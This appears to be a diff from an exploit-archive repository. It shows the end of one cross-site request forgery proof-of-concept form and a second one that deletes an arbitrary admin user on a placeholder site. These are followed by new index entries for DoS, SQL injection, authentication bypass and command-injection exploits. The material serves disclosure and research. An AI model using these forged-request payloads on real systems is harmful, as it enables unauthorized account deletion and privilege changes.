<input type="hidden" name="11_103" value="11_103" />
|
||||
<input type="hidden" name="11_104" value="11_104" />
|
||||
<input type="hidden" name="12_p" value="12_p" />
|
||||
<input type="hidden" name="12_1" value="12_1" />
|
||||
<input type="hidden" name="12_2" value="12_2" />
|
||||
<input type="hidden" name="12_3" value="12_3" />
|
||||
<input type="hidden" name="12_4" value="12_4" />
|
||||
<input type="hidden" name="12_5" value="12_5" />
|
||||
<input type="hidden" name="12_11" value="12_11" />
|
||||
<input type="hidden" name="12_6" value="12_6" />
|
||||
<input type="hidden" name="12_7" value="12_7" />
|
||||
<input type="hidden" name="12_8" value="12_8" />
|
||||
<input type="hidden" name="12_12" value="12_12" />
|
||||
<input type="hidden" name="12_9" value="12_9" />
|
||||
<input type="hidden" name="12_10" value="12_10" />
|
||||
<input type="hidden" name="13_p" value="13_p" />
|
||||
<input type="hidden" name="13_1" value="13_1" />
|
||||
<input type="hidden" name="13_2" value="13_2" />
|
||||
<input type="hidden" name="13_3" value="13_3" />
|
||||
<input type="hidden" name="13_17" value="13_17" />
|
||||
<input type="hidden" name="13_4" value="13_4" />
|
||||
<input type="hidden" name="13_5" value="13_5" />
|
||||
<input type="hidden" name="13_6" value="13_6" />
|
||||
<input type="hidden" name="13_18" value="13_18" />
|
||||
<input type="hidden" name="13_7" value="13_7" />
|
||||
<input type="hidden" name="13_8" value="13_8" />
|
||||
<input type="hidden" name="13_9" value="13_9" />
|
||||
<input type="hidden" name="13_19" value="13_19" />
|
||||
<input type="hidden" name="13_20" value="13_20" />
|
||||
<input type="hidden" name="13_10" value="13_10" />
|
||||
<input type="hidden" name="13_11" value="13_11" />
|
||||
<input type="hidden" name="13_12" value="13_12" />
|
||||
<input type="hidden" name="13_21" value="13_21" />
|
||||
<input type="hidden" name="13_22" value="13_22" />
|
||||
<input type="hidden" name="13_13" value="13_13" />
|
||||
<input type="hidden" name="13_14" value="13_14" />
|
||||
<input type="hidden" name="13_15" value="13_15" />
|
||||
<input type="hidden" name="13_16" value="13_16" />
|
||||
<input type="hidden" name="13_108" value="13_108" />
|
||||
<input type="hidden" name="13_23" value="13_23" />
|
||||
<input type="hidden" name="13_101" value="13_101" />
|
||||
<input type="hidden" name="13_102" value="13_102" />
|
||||
<input type="hidden" name="13_103" value="13_103" />
|
||||
<input type="hidden" name="13_104" value="13_104" />
|
||||
<input type="hidden" name="13_106" value="13_106" />
|
||||
<input type="hidden" name="13_105" value="13_105" />
|
||||
<input type="hidden" name="14_p" value="14_p" />
|
||||
<input type="hidden" name="14_1" value="14_1" />
|
||||
<input type="hidden" name="14_2" value="14_2" />
|
||||
<input type="hidden" name="14_3" value="14_3" />
|
||||
<input type="hidden" name="14_101" value="14_101" />
|
||||
<input type="hidden" name="14_4" value="14_4" />
|
||||
<input type="hidden" name="14_5" value="14_5" />
|
||||
<input type="hidden" name="14_6" value="14_6" />
|
||||
<input type="hidden" name="14_102" value="14_102" />
|
||||
<input type="hidden" name="14_7" value="14_7" />
|
||||
<input type="hidden" name="14_8" value="14_8" />
|
||||
<input type="hidden" name="14_9" value="14_9" />
|
||||
<input type="hidden" name="14_103" value="14_103" />
|
||||
<input type="hidden" name="14_10" value="14_10" />
|
||||
<input type="hidden" name="14_21" value="14_21" />
|
||||
<input type="hidden" name="14_104" value="14_104" />
|
||||
<input type="hidden" name="14_11" value="14_11" />
|
||||
<input type="hidden" name="14_105" value="14_105" />
|
||||
<input type="hidden" name="14_12" value="14_12" />
|
||||
<input type="hidden" name="14_106" value="14_106" />
|
||||
<input type="hidden" name="14_13" value="14_13" />
|
||||
<input type="hidden" name="14_14" value="14_14" />
|
||||
<input type="hidden" name="14_15" value="14_15" />
|
||||
<input type="hidden" name="14_16" value="14_16" />
|
||||
<input type="hidden" name="14_107" value="14_107" />
|
||||
<input type="hidden" name="14_17" value="14_17" />
|
||||
<input type="hidden" name="14_18" value="14_18" />
|
||||
<input type="hidden" name="14_19" value="14_19" />
|
||||
<input type="hidden" name="14_20" value="14_20" />
|
||||
<input type="hidden" name="15_p" value="15_p" />
|
||||
<input type="hidden" name="15_1" value="15_1" />
|
||||
<input type="hidden" name="15_2" value="15_2" />
|
||||
<input type="hidden" name="15_3" value="15_3" />
|
||||
<input type="hidden" name="16_p" value="16_p" />
|
||||
<input type="hidden" name="16_1" value="16_1" />
|
||||
<input type="hidden" name="16_2" value="16_2" />
|
||||
<input type="hidden" name="16_3" value="16_3" />
|
||||
<input type="hidden" name="16_101" value="16_101" />
|
||||
<input type="hidden" name="16_4" value="16_4" />
|
||||
<input type="hidden" name="16_5" value="16_5" />
|
||||
<input type="hidden" name="16_6" value="16_6" />
|
||||
<input type="hidden" name="16_102" value="16_102" />
|
||||
<input type="hidden" name="16_7" value="16_7" />
|
||||
<input type="hidden" name="16_8" value="16_8" />
|
||||
<input type="hidden" name="16_10" value="16_10" />
|
||||
<input type="hidden" name="16_11" value="16_11" />
|
||||
<input type="hidden" name="16_12" value="16_12" />
|
||||
<input type="hidden" name="16_103" value="16_103" />
|
||||
<input type="hidden" name="16_13" value="16_13" />
|
||||
<input type="hidden" name="16_14" value="16_14" />
|
||||
<input type="hidden" name="16_15" value="16_15" />
|
||||
<input type="hidden" name="16_17" value="16_17" />
|
||||
<input type="hidden" name="16_18" value="16_18" />
|
||||
<input type="hidden" name="16_20" value="16_20" />
|
||||
<input type="hidden" name="16_21" value="16_21" />
|
||||
<input type="hidden" name="16_24" value="16_24" />
|
||||
<input type="hidden" name="16_104" value="16_104" />
|
||||
<input type="hidden" name="16_105" value="16_105" />
|
||||
<input type="hidden" name="16_22" value="16_22" />
|
||||
<input type="hidden" name="16_25" value="16_25" />
|
||||
<input type="hidden" name="16_23" value="16_23" />
|
||||
<input type="hidden" name="16_26" value="16_26" />
|
||||
<input type="hidden" name="16_106" value="16_106" />
|
||||
<input type="hidden" name="16_107" value="16_107" />
|
||||
<input type="hidden" name="16_27" value="16_27" />
|
||||
<input type="hidden" name="16_28" value="16_28" />
|
||||
<input type="hidden" name="16_29" value="16_29" />
|
||||
<input type="hidden" name="17_p" value="17_p" />
|
||||
<input type="hidden" name="17_1" value="17_1" />
|
||||
<input type="hidden" name="17_6" value="17_6" />
|
||||
<input type="hidden" name="17_2" value="17_2" />
|
||||
<input type="hidden" name="17_3" value="17_3" />
|
||||
<input type="hidden" name="17_101" value="17_101" />
|
||||
<input type="hidden" name="17_4" value="17_4" />
|
||||
<input type="hidden" name="17_5" value="17_5" />
|
||||
<input type="hidden" name="17_7" value="17_7" />
|
||||
<input type="hidden" name="17_8" value="17_8" />
|
||||
<input type="hidden" name="17_9" value="17_9" />
|
||||
<input type="hidden" name="18_p" value="18_p" />
|
||||
<input type="hidden" name="18_5" value="18_5" />
|
||||
<input type="hidden" name="18_1" value="18_1" />
|
||||
<input type="hidden" name="18_2" value="18_2" />
|
||||
<input type="hidden" name="18_3" value="18_3" />
|
||||
<input type="hidden" name="18_4" value="18_4" />
|
||||
<input type="hidden" name="18_6" value="18_6" />
|
||||
<input type="hidden" name="18_7" value="18_7" />
|
||||
<input type="hidden" name="18_8" value="18_8" />
|
||||
<input type="hidden" name="18_9" value="18_9" />
|
||||
<input type="hidden" name="18_10" value="18_10" />
|
||||
<input type="hidden" name="18_11" value="18_11" />
|
||||
<input type="hidden" name="18_12" value="18_12" />
|
||||
<input type="hidden" name="19_p" value="19_p" />
|
||||
<input type="hidden" name="19_1" value="19_1" />
|
||||
<input type="hidden" name="19_2" value="19_2" />
|
||||
<input type="hidden" name="19_3" value="19_3" />
|
||||
<input type="hidden" name="19_4" value="19_4" />
|
||||
<input type="hidden" name="19_5" value="19_5" />
|
||||
<input type="hidden" name="19_6" value="19_6" />
|
||||
<input type="hidden" name="19_11" value="19_11" />
|
||||
<input type="hidden" name="19_7" value="19_7" />
|
||||
<input type="hidden" name="19_12" value="19_12" />
|
||||
<input type="hidden" name="19_13" value="19_13" />
|
||||
<input type="hidden" name="19_14" value="19_14" />
|
||||
<input type="hidden" name="19_15" value="19_15" />
|
||||
<input type="hidden" name="19_101" value="19_101" />
|
||||
<input type="hidden" name="19_102" value="19_102" />
|
||||
<input type="hidden" name="19_8" value="19_8" />
|
||||
<input type="hidden" name="19_16" value="19_16" />
|
||||
<input type="hidden" name="19_9" value="19_9" />
|
||||
<input type="hidden" name="19_10" value="19_10" />
|
||||
<input type="hidden" name="19_17" value="19_17" />
|
||||
<input type="hidden" name="19_18" value="19_18" />
|
||||
<input type="hidden" name="20_p" value="20_p" />
|
||||
<input type="hidden" name="20_1" value="20_1" />
|
||||
<input type="hidden" name="20_5" value="20_5" />
|
||||
<input type="hidden" name="20_101" value="20_101" />
|
||||
<input type="hidden" name="20_2" value="20_2" />
|
||||
<input type="hidden" name="20_6" value="20_6" />
|
||||
<input type="hidden" name="20_102" value="20_102" />
|
||||
<input type="hidden" name="20_3" value="20_3" />
|
||||
<input type="hidden" name="20_4" value="20_4" />
|
||||
<input type="hidden" name="21_p" value="21_p" />
|
||||
<input type="hidden" name="21_1" value="21_1" />
|
||||
<input type="hidden" name="21_2" value="21_2" />
|
||||
<input type="hidden" name="21_3" value="21_3" />
|
||||
<input type="hidden" name="22_p" value="22_p" />
|
||||
<input type="hidden" name="22_1" value="22_1" />
|
||||
<input type="hidden" name="22_2" value="22_2" />
|
||||
<input type="hidden" name="22_3" value="22_3" />
|
||||
<input type="hidden" name="22_5" value="22_5" />
|
||||
<input type="hidden" name="22_4" value="22_4" />
|
||||
<input type="hidden" name="22_6" value="22_6" />
|
||||
<input type="hidden" name="23_p" value="23_p" />
|
||||
<input type="hidden" name="24_p" value="24_p" />
|
||||
<input type="hidden" name="24_1" value="24_1" />
|
||||
<input type="hidden" name="24_2" value="24_2" />
|
||||
<input type="hidden" name="24_3" value="24_3" />
|
||||
<input type="hidden" name="24_4" value="24_4" />
|
||||
<input type="hidden" name="25_p" value="25_p" />
|
||||
<input type="hidden" name="25_1" value="25_1" />
|
||||
<input type="hidden" name="25_2" value="25_2" />
|
||||
<input type="hidden" name="25_5" value="25_5" />
|
||||
<input type="hidden" name="25_6" value="25_6" />
|
||||
<input type="hidden" name="25_3" value="25_3" />
|
||||
<input type="hidden" name="25_4" value="25_4" />
|
||||
<input type="hidden" name="25_7" value="25_7" />
|
||||
<input type="hidden" name="25_8" value="25_8" />
|
||||
<input type="hidden" name="26_p" value="26_p" />
|
||||
<input type="hidden" name="26_1" value="26_1" />
|
||||
<input type="hidden" name="26_2" value="26_2" />
|
||||
<input type="hidden" name="27_p" value="27_p" />
|
||||
<input type="hidden" name="27_1" value="27_1" />
|
||||
<input type="hidden" name="27_2" value="27_2" />
|
||||
<input type="hidden" name="27_3" value="27_3" />
|
||||
<input type="hidden" name="28_p" value="28_p" />
|
||||
<input type="hidden" name="28_1" value="28_1" />
|
||||
<input type="hidden" name="28_2" value="28_2" />
|
||||
<input type="hidden" name="28_3" value="28_3" />
|
||||
<input type="hidden" name="28_4" value="28_4" />
|
||||
<input type="hidden" name="28_5" value="28_5" />
|
||||
<input type="hidden" name="29_p" value="29_p" />
|
||||
<input type="hidden" name="29_1" value="29_1" />
|
||||
<input type="hidden" name="29_2" value="29_2" />
|
||||
<input type="hidden" name="30_p" value="30_p" />
|
||||
<input type="hidden" name="30_1" value="30_1" />
|
||||
<input type="hidden" name="30_2" value="30_2" />
|
||||
<input type="hidden" name="30_3" value="30_3" />
|
||||
<input type="hidden" name="30_4" value="30_4" />
|
||||
<input type="hidden" name="30_5" value="30_5" />
|
||||
<input type="hidden" name="30_6" value="30_6" />
|
||||
<input type="hidden" name="30_7" value="30_7" />
|
||||
<input type="hidden" name="30_8" value="30_8" />
|
||||
<input type="hidden" name="31_p" value="31_p" />
|
||||
<input type="hidden" name="31_1" value="31_1" />
|
||||
<input type="hidden" name="31_2" value="31_2" />
|
||||
<input type="hidden" name="31_3" value="31_3" />
|
||||
<input type="hidden" name="31_5" value="31_5" />
|
||||
<input type="hidden" name="31_4" value="31_4" />
|
||||
<input type="hidden" name="32_p" value="32_p" />
|
||||
<input type="hidden" name="32_3" value="32_3" />
|
||||
<input type="hidden" name="32_1" value="32_1" />
|
||||
<input type="hidden" name="32_4" value="32_4" />
|
||||
<input type="hidden" name="32_2" value="32_2" />
|
||||
<input type="hidden" name="32_5" value="32_5" />
|
||||
<input type="hidden" name="33_p" value="33_p" />
|
||||
<input type="hidden" name="33_1" value="33_1" />
|
||||
<input type="hidden" name="33_2" value="33_2" />
|
||||
<input type="hidden" name="33_3" value="33_3" />
|
||||
<input type="hidden" name="33_8" value="33_8" />
|
||||
<input type="hidden" name="33_4" value="33_4" />
|
||||
<input type="hidden" name="33_5" value="33_5" />
|
||||
<input type="hidden" name="33_6" value="33_6" />
|
||||
<input type="hidden" name="33_7" value="33_7" />
|
||||
<input type="hidden" name="34_p" value="34_p" />
|
||||
<input type="hidden" name="34_1" value="34_1" />
|
||||
<input type="hidden" name="34_2" value="34_2" />
|
||||
<input type="hidden" name="35_p" value="35_p" />
|
||||
<input type="hidden" name="35_1" value="35_1" />
|
||||
<input type="hidden" name="35_2" value="35_2" />
|
||||
<input type="hidden" name="35_3" value="35_3" />
|
||||
<input type="hidden" name="saveallowance" value="Submit" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
Proof of Concept for the arbitrary user deletion:
|
||||
<html>
|
||||
<body>
|
||||
<script>history.pushState('', '', '/')</script>
|
||||
<form action="http://SITEHERE/office_admin/">
|
||||
<input type="hidden" name="pid" value="42" />
|
||||
<input type="hidden" name="action" value="deleteadmin" />
|
||||
<input type="hidden" name="lid" value="90" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
|
@ -6664,6 +6664,8 @@ id,file,description,date,author,type,platform,port
|
|||
47955,exploits/windows/dos/47955.py,"BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)",2020-01-23,boku,dos,windows,
|
||||
47964,exploits/windows/dos/47964.cpp,"Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC)",2020-01-23,ollypwn,dos,windows,
|
||||
47970,exploits/multiple/dos/47970.txt,"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image",2020-01-28,"Google Security Research",dos,multiple,
|
||||
47987,exploits/linux/dos/47987.cs,"BearFTP 0.1.0 - 'PASV' Denial of Service",2020-02-03,kolya5544,dos,linux,
|
||||
47993,exploits/ios/dos/47993.py,"P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)",2020-02-03,"Ivan Marmolejo",dos,ios,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
|
@ -41981,7 +41983,7 @@ id,file,description,date,author,type,platform,port
|
|||
47305,exploits/php/webapps/47305.py,"openITCOCKPIT 3.6.1-2 - Cross-Site Request Forgery",2019-08-26,"Julian Rittweger",webapps,php,80
|
||||
47308,exploits/multiple/webapps/47308.py,"Tableau - XML External Entity",2019-08-27,"Jarad Kopf",webapps,multiple,
|
||||
47310,exploits/php/webapps/47310.txt,"SQLiteManager 1.2.0 / 1.2.4 - Blind SQL Injection",2019-08-28,"Rafael Pedrero",webapps,php,80
|
||||
47311,exploits/php/webapps/47311.txt,"Jobberbase 2.0 CMS - 'jobs-in' SQL Injection",2019-08-28,"Naren Jangra",webapps,php,80
|
||||
47311,exploits/php/webapps/47311.txt,"Jobberbase 2.0 CMS - 'jobs-in' SQL Injection",2019-08-28,"Suvadip Kar",webapps,php,80
|
||||
47312,exploits/php/webapps/47312.html,"WordPress Plugin GoURL.io < 1.4.14 - File Upload",2018-10-31,"Pouya Darabi",webapps,php,
|
||||
47314,exploits/php/webapps/47314.sh,"Jobberbase 2.0 - 'subscribe' SQL Injection",2019-08-29,"Damian Ebelties",webapps,php,80
|
||||
47315,exploits/php/webapps/47315.txt,"PilusCart 1.4.1 - Local File Disclosure",2019-08-29,"Damian Ebelties",webapps,php,80
|
||||
|
|
@ -42282,3 +42284,8 @@ id,file,description,date,author,type,platform,port
|
|||
47982,exploits/php/webapps/47982.py,"rConfig 3.9.3 - Authenticated Remote Code Execution",2020-01-30,vikingfr,webapps,php,
|
||||
47985,exploits/php/webapps/47985.txt,"Lotus Core CMS 1.0.1 - Local File Inclusion",2020-01-31,"Daniel Monzón",webapps,php,
|
||||
47986,exploits/php/webapps/47986.txt,"FlexNet Publisher 11.12.1 - Cross-Site Request Forgery (Add Local Admin)",2020-01-31,"Ismail Tasdelen",webapps,php,
|
||||
47988,exploits/php/webapps/47988.txt,"IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting",2020-02-03,"Lutfu Mert Ceylan",webapps,php,
|
||||
47989,exploits/php/webapps/47989.php,"phpList 3.5.0 - Authentication Bypass",2020-02-03,"Suvadip Kar",webapps,php,
|
||||
47990,exploits/java/webapps/47990.py,"Jira 8.3.4 - Information Disclosure (Username Enumeration)",2020-02-03,"Mufeed VH",webapps,java,
|
||||
47991,exploits/hardware/webapps/47991.py,"Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection",2020-02-03,"Cosmin Craciun",webapps,hardware,
|
||||
47992,exploits/php/webapps/47992.txt,"School ERP System 1.0 - Cross Site Request Forgery (Add Admin)",2020-02-03,J3rryBl4nks,webapps,php,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue